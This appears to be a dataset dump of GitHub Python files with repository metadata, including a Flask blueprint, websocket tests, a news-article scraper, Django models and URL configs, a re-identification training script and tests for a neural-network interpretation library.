| blob_id (string, len 40) | directory_id (string, len 40) | path (string, len 2–616) | content_id (string, len 40) | detected_licenses (list, len 0–69) | license_type (string, 2 classes) | repo_name (string, len 5–118) | snapshot_id (string, len 40) | revision_id (string, len 40) | branch_name (string, len 4–63) | visit_date (timestamp[us]) | revision_date (timestamp[us]) | committer_date (timestamp[us]) | github_id (int64, 2.91k–686M, nullable) | star_events_count (int64, 0–209k) | fork_events_count (int64, 0–110k) | gha_license_id (string, 23 classes) | gha_event_created_at (timestamp[us]) | gha_created_at (timestamp[us]) | gha_language (string, 213 classes) | src_encoding (string, 30 classes) | language (string, 1 class) | is_vendor (bool) | is_generated (bool) | length_bytes (int64, 2–10.3M) | extension (string, 246 classes) | content (string, len 2–10.3M) | authors (list, len 1) | author_id (string, len 0–212) |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
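Each row below pairs repository and file metadata with the file's full source text in the `content` cell. As a quick orientation, here is a minimal sketch of how a table with this schema could be streamed and inspected with the Hugging Face `datasets` library; the dataset path `org/dataset-name` is a placeholder, not the actual source of these rows.

```python
# Minimal sketch, assuming rows with the schema above are published as a
# Hugging Face dataset; "org/dataset-name" is a placeholder path.
from itertools import islice
from datasets import load_dataset

ds = load_dataset("org/dataset-name", split="train", streaming=True)

for row in islice(ds, 3):
    # Metadata columns describe the repo and file; `content` holds the raw source.
    print(row["repo_name"], row["path"], row["license_type"], row["length_bytes"])
```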
3833958d6d333505eb722912af50499ce6ee1de7
|
5bddb311ca1f71584446c463b7b0fa41ba4e6ebc
|
/app/order/__init__.py
|
8602730845fab98b9e91f761309799193248691e
|
[] |
no_license
|
a415432669/flask_web_mobile
|
229ccf8deaf0496d4af2506b68987db9b3a4f285
|
bf7efcd6718605d6fbe25643eb635f188e0e2faf
|
refs/heads/master
| 2020-03-18T08:30:55.153454
| 2018-04-07T01:10:35
| 2018-04-07T01:10:35
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 206
|
py
|
"""订单模块"""
'''
@Time : 2018/4/6 下午12:23
@Author : scrappy_zhang
@File : __init__.py.py
'''
from flask import Blueprint
order = Blueprint('order', __name__)
from app.order import orders
|
[
"a7478317@163.com"
] |
a7478317@163.com
|
d6f1670cbdfa6bfa3c8e5bf382812c7cac608b87
|
dad33400fb9b8d09a0301addd6c964830881d0c0
|
/tests/base_tests/test_ws.py
|
4b949afd962204ad62997e5c8df8ae4e733b491c
|
[
"Zlib"
] |
permissive
|
fy0/slim
|
e63ac112b9a3600e5221da3161fba4a2675c83e0
|
cfdb16ea2365b229b6d0aceb6cb83f45cdb78094
|
refs/heads/master
| 2021-07-06T06:20:46.329917
| 2020-09-17T06:32:20
| 2020-09-17T06:32:20
| 97,494,307
| 50
| 19
|
Zlib
| 2020-10-27T02:39:10
| 2017-07-17T15:54:41
|
Python
|
UTF-8
|
Python
| false
| false
| 3,400
|
py
|
import json
from typing import Union
import pytest
from slim import Application
from slim.base.ws import WebSocket
from slim.exception import InvalidRouteUrl
from slim.tools.test import make_mocked_ws_request
from slim.utils import async_call
pytestmark = [pytest.mark.asyncio]
app = Application(cookies_secret=b'123456', permission=None)
@app.route.websocket()
class WS(WebSocket):
on_connect_ = []
on_receive_ = []
async def on_connect(self):
await super().on_connect()
for i in self.on_connect_:
await async_call(i, self)
    async def on_receive(self, data: Union[str, bytes]):
for i in self.on_receive_:
i(self, data)
async def on_disconnect(self, code):
await super().on_disconnect(code)
@app.route.websocket()
class WS2(WebSocket):
pass
@app.route.websocket()
class WSSend(WebSocket):
async def on_connect(self):
await super().on_connect()
await self.send(b'111')
await self.send('222')
await self.send_json({'test': [1, 2, 3]})
await self.send_all('222')
await self.send_all_json({'test': [1, 2, 3]})
@app.route.websocket('qqq/:test')
class WS3(WebSocket):
async def on_connect(self):
await super().on_connect()
assert self.match_info == {'test': '1'}
app.prepare()
async def test_websocket_base():
req = await make_mocked_ws_request('/api/ws')
await app(req.scope, req.receive, req.send)
async def test_websocket_on_connect():
req = await make_mocked_ws_request('/api/ws')
flag = 0
assert len(WS.connections) == 0
async def func(ws):
nonlocal flag
flag = 1
assert len(ws.connections) == 1
assert len(WS2.connections) == 0
WS.on_connect_.append(func)
await app(req.scope, req.receive, req.send)
assert flag == 1
async def test_websocket_receive():
req = await make_mocked_ws_request('/api/ws')
recv_lst = [
{'type': 'websocket.connect'},
{'type': 'websocket.receive', 'text': '111'},
{'type': 'websocket.receive', 'bytes': b'222'},
{'type': 'websocket.disconnect', 'code': 1006}
]
async def receive():
if recv_lst:
return recv_lst.pop(0)
def func(ws, data):
assert data == '111'
WS.on_receive_.clear()
WS.on_receive_.append(func2)
def func2(ws, data):
assert data == b'222'
WS.on_receive_.append(func)
await app(req.scope, receive, req.send)
async def test_websocket_send():
req = await make_mocked_ws_request('/api/ws_send') # WSSend
lst = [
{'type': 'websocket.accept'},
{'type': 'websocket.send', 'bytes': b'111'},
{'type': 'websocket.send', 'text': '222'},
{'type': 'websocket.send', 'text': json.dumps({'test': [1, 2, 3]})},
{'type': 'websocket.send', 'text': '222'},
{'type': 'websocket.send', 'text': json.dumps({'test': [1, 2, 3]})},
]
async def send(message):
assert message == lst.pop(0)
await app(req.scope, req.receive, send)
async def test_websocket_regex_route():
req = await make_mocked_ws_request('/api/qqq/1')
await app(req.scope, req.receive, req.send)
async def test_websocket_failed():
route_info, call_kwargs_raw = app.route.query_ws_path('/api/asd')
assert route_info is None
assert call_kwargs_raw is None
|
[
"fy0@qq.com"
] |
fy0@qq.com
|
68d8a31782c2ea1554e0f50b8e59970aa650f14f
|
65b5b1a96b680f975017c25fe7e898ef7818c2dd
|
/scrape.py
|
121860396f8e93526147d43733a8d3bb5b133218
|
[] |
no_license
|
kchatpar/Spark-ML-Classifier
|
2f6e680befd02c8adaa5a23355786b945d396363
|
24366dab209f705be8ea1a7bba86e409ab874f09
|
refs/heads/master
| 2020-03-15T03:33:08.690201
| 2018-12-06T21:11:19
| 2018-12-06T21:11:19
| 131,944,867
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,940
|
py
|
#This script was designed by Krishna Chatpar
#This script uses the keywords Obama, Bonds, Amazon, and Warriors
#to gather articles in the respective categories of: Politics, Business, Technology, and Sports.
#Each article is written to a text file in its respective folder
#
import bs4 as bs  # imported as `bs` because the code below calls bs.BeautifulSoup
import urllib.request  # used to fetch each article URL
import os  # used for os.path.exists and os.makedirs
from nytimesarticle import articleAPI
from time import sleep
categories = ['Sports','Business','Technology','Politics']
#Loop through each of the four categories and scrape the articles
#Each article is stored in it's own labeled sub folder in a respective file
for i in range(4):
cat = categories[i]
sleep(5)
if cat == 'Politics':
api = articleAPI('4ca755df21fd4011a1e98f306cd2adef')
path = '/Users/krishnachatpar/Desktop/Github/Articles/'+categories[i]
articles = api.search(q="Obama")
url_list=[]
for data in articles['response']['docs']:
url_list.append(data['web_url'])
if not os.path.exists(path):
os.makedirs(path)
for i in range(0,len(url_list)):
file_name = 'data'+str(i)+'.txt'
completeName = os.path.join(path,file_name)
f = open(completeName,'w')
sauce = urllib.request.urlopen(url_list[i]).read()
soup = bs.BeautifulSoup(sauce,'lxml')
for paragraph in soup.find_all('p'):
f.write(paragraph.text)
f.close()
if cat == 'Business':
api = articleAPI('4ca755df21fd4011a1e98f306cd2adef')
path = '/Users/krishnachatpar/Desktop/Github/Articles/'+categories[i]
articles = api.search(q="Bonds")
url_list=[]
for data in articles['response']['docs']:
url_list.append(data['web_url'])
if not os.path.exists(path):
os.makedirs(path)
for i in range(0,len(url_list)):
file_name = 'data'+str(i)+'.txt'
completeName = os.path.join(path,file_name)
f = open(completeName,'w')
sauce = urllib.request.urlopen(url_list[i]).read()
soup = bs.BeautifulSoup(sauce,'lxml')
for paragraph in soup.find_all('p'):
f.write(paragraph.text)
f.close()
if cat == 'Technology':
api = articleAPI('4ca755df21fd4011a1e98f306cd2adef')
path = '/Users/krishnachatpar/Desktop/Github/Articles/'+categories[i]
articles = api.search(q="Amazon")
url_list=[]
for data in articles['response']['docs']:
url_list.append(data['web_url'])
if not os.path.exists(path):
os.makedirs(path)
for i in range(0,len(url_list)):
file_name = 'data'+str(i)+'.txt'
completeName = os.path.join(path,file_name)
f = open(completeName,'w')
sauce = urllib.request.urlopen(url_list[i]).read()
soup = bs.BeautifulSoup(sauce,'lxml')
for paragraph in soup.find_all('p'):
f.write(paragraph.text)
f.close()
if cat == 'Sports':
api = articleAPI('4ca755df21fd4011a1e98f306cd2adef')
path = '/Users/krishnachatpar/Desktop/Github/Articles/'+categories[i]
articles = api.search(q="Warriors")
url_list=[]
for data in articles['response']['docs']:
url_list.append(data['web_url'])
if not os.path.exists(path):
os.makedirs(path)
for i in range(0,len(url_list)):
file_name = 'data'+str(i)+'.txt'
completeName = os.path.join(path,file_name)
f = open(completeName,'w')
sauce = urllib.request.urlopen(url_list[i]).read()
soup = bs.BeautifulSoup(sauce,'lxml')
for paragraph in soup.find_all('p'):
f.write(paragraph.text)
f.close()
|
[
"kchatpar@buffalo.edu"
] |
kchatpar@buffalo.edu
|
d83291ba08687c050825bbfce9c669dc8f086448
|
3c03ecb8e066f2d4eac73a469a75e5906734c66c
|
/_2019_2020/Classworks/_11_16_11_2019/_4.py
|
b7f6f6b64474e765e73e91c52ec9d5e8cd383fc6
|
[] |
no_license
|
waldisjr/JuniorIT
|
af1648095ec36535cc52770b114539444db4cd0b
|
6a67e713708622ae13db6d17b48e43e3d10611f2
|
refs/heads/master
| 2023-03-26T06:29:06.423163
| 2021-03-27T06:27:34
| 2021-03-27T06:27:34
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 38
|
py
|
for i in range(3,123,3):
print(i)
|
[
"waldis_jr@outlook.com"
] |
waldis_jr@outlook.com
|
2803441b4522bcc0ee4d634e834b3e8509fef88a
|
f422be83dbee1a799b06d8b49003364290a77c4c
|
/examples/sda_train.py
|
441ae790de14e50dae2f24571fb05fc31fe84b64
|
[
"MIT"
] |
permissive
|
shuxjweb/MMT-plus
|
2235302b031345119b535b8087539e94238c9074
|
9b1934afa6ab34b1bb82af54547448914fc3ca7d
|
refs/heads/master
| 2022-12-23T05:11:43.145864
| 2020-09-30T04:42:28
| 2020-09-30T04:42:28
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,864
|
py
|
from __future__ import print_function, absolute_import
import argparse
import os.path as osp
import random
import numpy as np
import sys
import time
import shutil
import collections
import torch
from torch import nn
from torch.backends import cudnn
from torch.utils.data import DataLoader
from visda import datasets
from visda import models
from visda.evaluators import Evaluator, extract_features
from visda.utils.data import transforms as T
from visda.utils.data import IterLoader
from visda.utils.data.sampler import RandomMultipleGallerySampler, ShuffleBatchSampler
from visda.utils.data.preprocessor import Preprocessor
from visda.utils.logging import Logger
from visda.utils.serialization import load_checkpoint, save_checkpoint, copy_state_dict
from visda.utils.osutils import mkdir_if_missing
from visda.sda.options.train_options import TrainOptions
from visda.sda.models.sda_model import SDAModel
from visda.sda.util.visualizer import Visualizer
from visda.sda.models import networks
start_epoch = best_mAP = 0
def get_data(name, data_dir):
dataset = datasets.create(name, data_dir)
return dataset
def get_train_loader(dataset, height, width, batch_size, workers,
num_instances, iters, trainset=None):
normalizer = T.Normalize(mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225])
transformers = [T.Resize((height, width), interpolation=3),
T.RandomHorizontalFlip(p=0.5),
T.Pad(10),
T.RandomCrop((height, width)),
T.ToTensor(),
normalizer]
train_transformer = T.Compose(transformers)
train_set = dataset.train if trainset is None else trainset
rmgs_flag = num_instances > 0
if rmgs_flag:
sampler = RandomMultipleGallerySampler(train_set, num_instances)
train_loader = IterLoader(
DataLoader(Preprocessor(train_set, root=dataset.images_dir,
transform=train_transformer),
num_workers=workers, pin_memory=True,
batch_sampler=ShuffleBatchSampler(sampler, batch_size, True)), length=iters)
else:
train_loader = IterLoader(
DataLoader(Preprocessor(train_set, root=dataset.images_dir,
transform=train_transformer),
batch_size=batch_size, num_workers=workers, sampler=None,
shuffle=True, pin_memory=True, drop_last=True), length=iters)
return train_loader
def get_test_loader(dataset, height, width, batch_size, workers, testset=None):
normalizer = T.Normalize(mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225])
test_transformer = T.Compose([
T.Resize((height, width), interpolation=3),
T.ToTensor(),
normalizer
])
if (testset is None):
testset = list(set(dataset.query) | set(dataset.gallery))
test_loader = DataLoader(
Preprocessor(testset, root=dataset.images_dir, transform=test_transformer),
batch_size=batch_size, num_workers=workers,
shuffle=False, pin_memory=True)
return test_loader
def main():
    args = TrainOptions().parse() # get training options
args.checkpoints_dir = args.logs_dir
if args.seed is not None:
random.seed(args.seed)
np.random.seed(args.seed)
torch.manual_seed(args.seed)
torch.cuda.manual_seed(args.seed)
cudnn.deterministic = True
mkdir_if_missing(args.logs_dir)
main_worker(args)
def main_worker(args):
global start_epoch, best_mAP
args.gpu = None
args.rank = 0
    visualizer = Visualizer(args) # create a visualizer that displays/saves images and plots
total_iters = 0 # the total number of training iterations
cudnn.benchmark = True
sys.stdout = Logger(osp.join(args.logs_dir, 'log.txt'))
print("==========\nArgs:{}\n==========".format(args))
# Create data loaders
iters = args.iters if (args.iters>0) else None
print("==> Load source-domain trainset")
dataset_source = get_data('personx', args.data_dir)
print("==> Load target-domain trainset")
dataset_target = get_data('target_train', args.data_dir)
print("==> Load target-domain valset")
dataset_target_val = get_data('target_val', args.data_dir)
test_loader_target = get_test_loader(dataset_target_val, args.height, args.width, args.batch_size, args.workers)
# Create model
source_classes = dataset_source.num_train_pids
    model = SDAModel(args, source_classes) # create a model given args.model and other options
# Evaluator
evaluator_reid = Evaluator(model.net_B)
_, mAP = evaluator_reid.evaluate(test_loader_target, dataset_target_val.query, dataset_target_val.gallery)
print('\n * Baseline mAP for target domain: {:5.1%}\n'.format(mAP))
train_loader_source = get_train_loader(dataset_source, args.height, args.width,
args.batch_size, args.workers, args.num_instances, iters)
train_loader_target = get_train_loader(dataset_target, args.height, args.width,
args.batch_size, args.workers, 0, iters)
dataset_size = len(train_loader_source) * args.batch_size
best_mAP_reid = best_mAP_reid_s = best_mAP_gan = 0
for epoch in range(args.niter + args.niter_decay): # outer loop for different epochs; we save the model by <epoch_count>, <epoch_count>+<save_latest_freq>
epoch_start_time = time.time() # timer for entire epoch
train_loader_target.new_epoch()
train_loader_source.new_epoch()
iter_data_time = time.time() # timer for data loading per iteration
epoch_iter = 0
model.set_status_init()
for i in range(len(train_loader_source)): # inner loop within one epoch
source_inputs = train_loader_source.next()
target_inputs = train_loader_target.next()
iter_start_time = time.time() # timer for computation per iteration
if total_iters % args.print_freq == 0:
t_data = iter_start_time - iter_data_time
visualizer.reset()
total_iters += args.batch_size
epoch_iter += args.batch_size
model.set_input(source_inputs, target_inputs) # unpack data from dataset and apply preprocessing
model.optimize_parameters(epoch*len(train_loader_source)+i, epoch) # calculate loss functions, get gradients, update network weights
if total_iters % args.display_freq == 0: # display images on visdom and save images to a HTML file
save_result = total_iters % args.update_html_freq == 0
model.compute_visuals()
visualizer.display_current_results(model.get_current_visuals(), epoch, save_result)
if total_iters % args.print_freq == 0: # print training losses and save logging information to the disk
losses = model.get_current_losses()
t_comp = (time.time() - iter_start_time) / args.batch_size
visualizer.print_current_losses(epoch, epoch_iter, losses, t_comp, t_data)
if args.display_id > 0:
visualizer.plot_current_losses(epoch, float(epoch_iter) / dataset_size, losses)
if total_iters % args.save_latest_freq == 0: # cache our latest model every <save_latest_freq> iterations
print('saving the latest model (epoch %d, total_iters %d)' % (epoch, total_iters))
save_suffix = 'iter_%d' % total_iters if args.save_by_iter else 'latest'
model.save_networks(save_suffix)
iter_data_time = time.time()
if epoch % args.save_epoch_freq == 0: # cache our model every <save_epoch_freq> epochs
print('saving the model at the end of epoch %d, iters %d' % (epoch, total_iters))
model.save_networks('latest')
if ((epoch+1)%args.eval_step==0):
_, mAP = evaluator_reid.evaluate(test_loader_target, dataset_target_val.query, dataset_target_val.gallery)
is_best = (mAP>best_mAP)
best_mAP = max(mAP, best_mAP)
print('\n * Target Domain: Finished epoch [{:3d}] mAP: {:5.1%} best: {:5.1%}{}\n'.
format(epoch, mAP, best_mAP, ' *' if is_best else ''))
print('End of epoch %d / %d \t Time Taken: %d sec' % (epoch, args.niter + args.niter_decay, time.time() - epoch_start_time))
model.update_learning_rate() # update learning rates at the end of every epoch.
if __name__ == '__main__':
main()
|
[
"geyixiao831@gmail.com"
] |
geyixiao831@gmail.com
|
3f42edc91bf39828dbde3f85ff6ae189e63ace53
|
51d1c121a664ddb73c0c149aaf14c8f806a43a67
|
/apps/operation/models.py
|
aa4aedcb113ac8d0272e2768ff04b59bb666ead9
|
[] |
no_license
|
hui-yu1/xwzjOnline
|
9f60e93bf11a6b70aee5756a0ce0260199d292a7
|
aa4a9bea84f3153fc4d63e746e29f0112143dceb
|
refs/heads/master
| 2022-08-24T10:07:21.823558
| 2020-05-22T11:08:11
| 2020-05-22T11:08:11
| 265,725,940
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,301
|
py
|
from datetime import datetime
from django.db import models
from course.models import Course
from users.models import UserProfile
class UserAsk(models.Model):
name = models.CharField('姓名',max_length=20)
mobile = models.CharField('手机',max_length=11)
course_name = models.CharField('课程名',max_length=50)
add_time = models.DateTimeField('添加时间',default=datetime.now)
class Meta:
verbose_name = '用户咨询'
verbose_name_plural = verbose_name
def __str__(self):
return self.name
class CourseComments(models.Model):
user = models.ForeignKey(UserProfile,verbose_name='用户',on_delete=models.CASCADE)
course = models.ForeignKey(Course,verbose_name='课程',on_delete=models.CASCADE)
comments = models.CharField('评论',max_length=200)
add_time = models.DateTimeField('添加时间', default=datetime.now)
class Meta:
verbose_name = '课程评论'
verbose_name_plural = verbose_name
class UserFavorite(models.Model):
FAV_TYPE = (
(1,'课程'),
(2,'课程机构'),
(3,'讲师')
)
user = models.ForeignKey(UserProfile,verbose_name='用户',on_delete=models.CASCADE)
fav_id = models.IntegerField('数据id',default=0)
fav_type = models.IntegerField(verbose_name='收藏类型',choices=FAV_TYPE,default=1)
add_time = models.DateTimeField('添加时间', default=datetime.now)
class Meta:
verbose_name = '用户收藏'
verbose_name_plural = verbose_name
class UserMessage(models.Model):
user = models.IntegerField('接受用户',default=0)
message = models.CharField('消息内容',max_length=500)
has_read = models.BooleanField('是否已读',default=False)
add_time = models.DateTimeField('添加时间', default=datetime.now)
class Meta:
verbose_name = '用户消息'
verbose_name_plural = verbose_name
class UserCourse(models.Model):
user = models.ForeignKey(UserProfile,verbose_name='用户',on_delete=models.CASCADE)
course = models.ForeignKey(Course,verbose_name='课程',on_delete=models.CASCADE)
add_time = models.DateTimeField('添加时间', default=datetime.now)
class Meta:
verbose_name = '用户课程'
verbose_name_plural = verbose_name
|
[
"3478474830@qq.com"
] |
3478474830@qq.com
|
1c4a583cefed80075b2f85fe67e37895cd7206c0
|
392569362c0198d491f40d8831be55da10bcd983
|
/agregator/toulouse_agregator.py
|
2be81eec0ff9d9da081949361f5f6d4cad04ac97
|
[] |
no_license
|
JaladeSamuel/se_dashboard
|
4d1e81f5bd613f1d52ea7210b404490450e565c2
|
b45b989712f09c74db7e740aa21287f73535df4e
|
refs/heads/main
| 2023-03-03T18:56:19.740146
| 2021-02-14T00:27:07
| 2021-02-14T00:27:07
| 309,417,659
| 2
| 0
| null | 2021-02-13T23:00:31
| 2020-11-02T15:47:00
| null |
UTF-8
|
Python
| false
| false
| 185
|
py
|
import agregator
if __name__=="__main__":
print("Starting toulouse_agregator")
agregateur1 = agregator.Agregator_moyenne("toulouse_agregator", "toulouse", 43.6047, 1.4435, 2)
|
[
"sam34440@hotmail.fr"
] |
sam34440@hotmail.fr
|
5c40fe7456479483b345430a9c0bac0c99277472
|
d1d93e481679a84b9014280bad2d0b8b6becdb2a
|
/memokeep/urls.py
|
3da020edfa30000b3a29bea2b5f54d010c7b8ed9
|
[
"MIT"
] |
permissive
|
hmarsolla/memokeep-server
|
4c0039494e205b70963acbd727c32b4d0369058e
|
101bc5fb4ee217503cd125cf7c7a769a15c81e76
|
refs/heads/master
| 2020-04-03T05:12:44.851321
| 2018-10-28T05:28:03
| 2018-10-28T05:28:03
| 155,038,451
| 1
| 0
| null | 2018-10-28T05:28:04
| 2018-10-28T05:26:22
|
Python
|
UTF-8
|
Python
| false
| false
| 1,187
|
py
|
"""memokeep URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
# from django.contrib import admin
# from django.urls import path
# urlpatterns = [
# path('admin/', admin.site.urls),
# ]
from django.conf.urls import url, include
from rest_framework import routers
from .memos import views
router = routers.DefaultRouter()
router.register(r'memo', views.MemoViewSet)
# Wire up our API using automatic URL routing.
# Additionally, we include login URLs for the browsable API.
urlpatterns = [
url(r'^', include(router.urls)),
url(r'^api-auth/', include('rest_framework.urls', namespace='rest_framework'))
]
|
[
"hmarsolla@hotmail.com"
] |
hmarsolla@hotmail.com
|
9a27d1852a9f71e37950acae46e354fe11668f20
|
010b9b003f71bae2feed4c050ee97a7a806766c5
|
/tests/test_cd.py
|
045eceff17a2ce6816ea3f35d5b2e20a4a2498ea
|
[
"MIT"
] |
permissive
|
SilanHe/hierarchical-dnn-interpretations
|
19c4bb524e80288e61b55ae7bda8a3402f4def51
|
d6f96d0ab6fec48ee53ab930b2660e80525993b9
|
refs/heads/master
| 2022-04-20T15:38:48.677928
| 2020-01-20T18:27:50
| 2020-01-20T18:27:50
| 255,742,196
| 0
| 0
|
MIT
| 2020-04-14T22:29:59
| 2020-04-14T22:29:58
| null |
UTF-8
|
Python
| false
| false
| 4,957
|
py
|
import numpy as np
import torch
import sys
import acd
import pickle as pkl
import warnings
warnings.filterwarnings("ignore")
def test_sst(device='cpu'):
# load the model and data
sys.path.append('../dsets/sst')
from dsets.sst.model import LSTMSentiment
sst_pkl = pkl.load(open('../dsets/sst/sst_vocab.pkl', 'rb'))
model = torch.load('../dsets/sst/sst.model', map_location=device)
model.device = device
# text and label
sentence = ['a', 'great', 'ensemble', 'cast', 'ca', 'n\'t', 'lift', 'this', 'heartfelt', 'enterprise', 'out', 'of', 'the', 'familiar', '.'] # note this is a real example from the dataset
def batch_from_str_list(s):
# form class to hold data
class B:
text = torch.zeros(1).to(device)
batch = B()
nums = np.expand_dims(np.array([sst_pkl['stoi'][x] for x in s]).transpose(), axis=1)
batch.text = torch.LongTensor(nums).to(device) #cuda()
return batch
# prepare inputs
batch = batch_from_str_list(sentence)
preds = model(batch).data.cpu().numpy()[0] # predict
# check that full sentence = prediction
preds = preds - model.hidden_to_label.bias.detach().numpy()
cd_score, irrel_scores = acd.cd_text(batch, model, start=0, stop=len(sentence), return_irrel_scores=True)
assert(np.allclose(cd_score, preds, atol=1e-2))
assert(np.allclose(irrel_scores, irrel_scores * 0, atol=1e-2))
# check that rel + irrel = prediction for another subset
cd_score, irrel_scores = acd.cd_text(batch, model, start=3, stop=len(sentence), return_irrel_scores=True)
assert(np.allclose(cd_score + irrel_scores, preds, atol=1e-2))
def test_mnist(device='cuda'):
# load the dataset
sys.path.append('../dsets/mnist')
import dsets.mnist.model
device = 'cuda'
im_torch = torch.randn(1, 1, 28, 28).to(device)
# load the model
model = dsets.mnist.model.Net().to(device)
model.load_state_dict(torch.load('../dsets/mnist/mnist.model', map_location=device))
model = model.eval()
# check that full image mask = prediction
preds = model.logits(im_torch).cpu().detach().numpy()
cd_score, irrel_scores = acd.cd(im_torch, model, mask=np.ones((1, 1, 28, 28)), model_type='mnist', device=device)
cd_score = cd_score.cpu().detach().numpy()
irrel_scores = irrel_scores.cpu().detach().numpy()
assert(np.allclose(cd_score, preds, atol=1e-2))
assert(np.allclose(irrel_scores, irrel_scores * 0, atol=1e-2))
# check that rel + irrel = prediction for another subset
# preds = preds - model.hidden_to_label.bias.detach().numpy()
mask = np.zeros((28, 28))
mask[:14] = 1
cd_score, irrel_scores = acd.cd(im_torch, model, mask=mask, model_type='mnist', device=device)
cd_score = cd_score.cpu().detach().numpy()
irrel_scores = irrel_scores.cpu().detach().numpy()
assert(np.allclose(cd_score + irrel_scores, preds, atol=1e-2))
def test_imagenet(device='cuda', arch='vgg'):
# get dataset
from torchvision import models
imnet_dict = pkl.load(open('../dsets/imagenet/imnet_dict.pkl', 'rb')) # contains 6 images (keys: 9, 10, 34, 20, 36, 32)
# get model and image
if arch == 'vgg':
model = models.vgg16(pretrained=True).to(device).eval()
elif arch == 'alexnet':
model = models.alexnet(pretrained=True).to(device).eval()
elif arch == 'resnet18':
model = models.resnet18(pretrained=True).to(device).eval()
im_torch = torch.randn(1, 3, 224, 224).to(device)
# get predictions
preds = model(im_torch).cpu().detach().numpy()
# check that rel + irrel = prediction for another subset
    mask = np.zeros((1, 3, 224, 224))  # start empty so the mask selects a proper subset
    mask[:, :, :14] = 1
cd_score, irrel_scores = acd.cd(im_torch, model, mask=mask, device=device, model_type=arch)
cd_score = cd_score.cpu().detach().numpy()
irrel_scores = irrel_scores.cpu().detach().numpy()
assert(np.allclose(cd_score + irrel_scores, preds, atol=1e-2))
# check that full image mask = prediction
cd_score, irrel_scores = acd.cd(im_torch, model, mask=np.ones((1, 3, 224, 224)), device=device, model_type=arch)
cd_score = cd_score.cpu().detach().numpy()
irrel_scores = irrel_scores.cpu().detach().numpy()
# print(cd_score.flatten()[:5], irrel_scores.flatten()[:5], preds.flatten()[:5])
assert(np.allclose(cd_score, preds, atol=1e-2))
assert(np.allclose(irrel_scores, irrel_scores * 0, atol=1e-2))
if __name__ == '__main__':
print('testing sst...')
test_sst()
print('testing mnist...')
test_mnist()
print('testing imagenet vgg...')
test_imagenet(arch='vgg')
print('testing imagenet alexnet...')
test_imagenet(arch='alexnet')
print('testing imagenet resnet18...')
with torch.no_grad():
test_imagenet(arch='resnet18')
print('all tests passed!')
# loop over device types?
# try without torch.no_grad()?
|
[
"chandan_singh@berkeley.edu"
] |
chandan_singh@berkeley.edu
|
ab8552e93d0f54492fb7640136c1d3cda1b0c205
|
3ac96cdcca7e948f67739c66a56558bd88cb9724
|
/1st_prjct_SlickDeals/webscrape.py
|
ff830646b00fef0bc983e02146bdf0b2d68379fa
|
[] |
no_license
|
suatakbulut/webscrape
|
309fed38efb7734c3da681f28fbf3cf024f1dd04
|
1a6658dda99366d811e664112e39ffa06d7b5d42
|
refs/heads/master
| 2020-12-13T13:24:35.295454
| 2020-01-17T06:54:10
| 2020-01-17T06:54:10
| 234,431,705
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,168
|
py
|
"""
In this project, I will scrape data Frontpage Slickdeals from slickdeals.net.
For each deal, I will collect the information about the following:
Vendor Name
Item Name
List Price (If available)
Discounted price
"""
from bs4 import BeautifulSoup as soup
import requests as Req
# The url of the website we want to scrape data from
my_url = "https://slickdeals.net/"
page_url = Req.get(my_url)
page_soup = soup(page_url.content, "html.parser")
"""
Now we have all the information on the website.
But it is all garbled, just like a bowl of soup
We need to find what we are looking for and get it.
There are multiple ways to obtain those list items.
Observing that each deal is in a division with class name fpItem
I will choose all division with that class name
PS: At this stage https://beautifier.io/ is really nice source
to better see the structure of the website
"""
deals = page_soup.findAll("div", attrs={"class":"fpItem"})
header = "Deal Name, Vendor, Original Price, Discounted Price\n"
"""
For a given container deal, which is a bs4 element, following functions will
find and return the
- Item's Name
- Vendor's Name
- Original List Price
- Discounted Price
"""
def itemTitle(deal):
return deal.find("a", attrs={"class":"itemTitle"}).text.strip().replace(",", "|")
def itemStore(deal):
    try:
        return deal.find("a", attrs={"class":"itemStore"}).text.strip()
    except AttributeError:
        return deal.find("span", attrs={"class":"itemStore"}).text.strip()
def listPrice(deal):
    try:
        return deal.find("div", attrs={"class":"listPrice"}).text.strip()
    except AttributeError:
        try:
            return deal.find("span", attrs={"class":"oldListPrice"}).text.strip()
        except AttributeError:
            return 'Not Available'
def itemPrice(deal):
p = deal.find("div", attrs={"class":"itemPrice"}).text.strip().split("\n")[0].strip().replace(",", "")
if "%" in p:
return "Not Available"
else:
return p
f = open("Deals.csv", "w")
f.write(header)
for deal in deals[1:-2]:
line = itemTitle(deal) + "," + itemStore(deal) + "," + listPrice(deal) + "," + itemPrice(deal)+ "\n"
f.write(line)
f.close()
|
[
"sqa5456@psu.edu"
] |
sqa5456@psu.edu
|
2577704640f0cc5286b607bd56b60a6de915bd47
|
40d740712137b8004fc26f04cecdc852d59d88fd
|
/Test/Python编码/struct.py
|
267b686f1d9e5bfe8159cb45498820cabe7172e9
|
[] |
no_license
|
xiaohua0877/python_prog
|
d164c8e03fbf6f5cd3cf52da3764bbc3ac2be871
|
38d8999f8e5cc3137a904c1aa1605cb17781dba6
|
refs/heads/master
| 2020-06-19T19:22:34.050242
| 2019-08-18T14:32:18
| 2019-08-18T14:32:18
| 196,841,172
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 724
|
py
|
__all__ = [
# Functions
'calcsize', 'pack', 'pack_into', 'unpack', 'unpack_from',
'iter_unpack',
# Classes
'Struct',
# Exceptions
'error'
]
from _struct import *
from _struct import _clearcache
from _struct import __doc__
#from struct import *
#
# b = pack('hhl', 1, 2, 3)
# print(b)
# b = unpack('hhl', b'\x01\x00\x02\x00\x03\x00\x00\x00')
# print(b)
# b = calcsize('hhl')
